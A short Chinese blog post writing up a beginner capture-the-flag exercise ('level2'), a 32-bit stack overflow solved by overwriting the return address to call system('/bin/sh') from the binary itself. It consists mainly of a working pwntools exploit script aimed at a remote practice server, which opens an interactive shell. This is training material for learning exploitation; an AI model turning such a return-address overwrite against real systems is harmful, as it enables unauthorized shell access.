新手练习06-level2

也是栈溢出,不过这次没有现成的system("/bin/sh")可以利用了,但是在函数中还是发现了system函数,才查看字符串也找到了"/bin/sh",很明显可以看书构造system("/bin/sh")
exp:

from pwn import *
# p = process('./level2')
p = remote("111.198.29.45","31011")
system = 0x8048320
binsh = 0x804A024
payload = 0x8c*'a' + p32(system) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容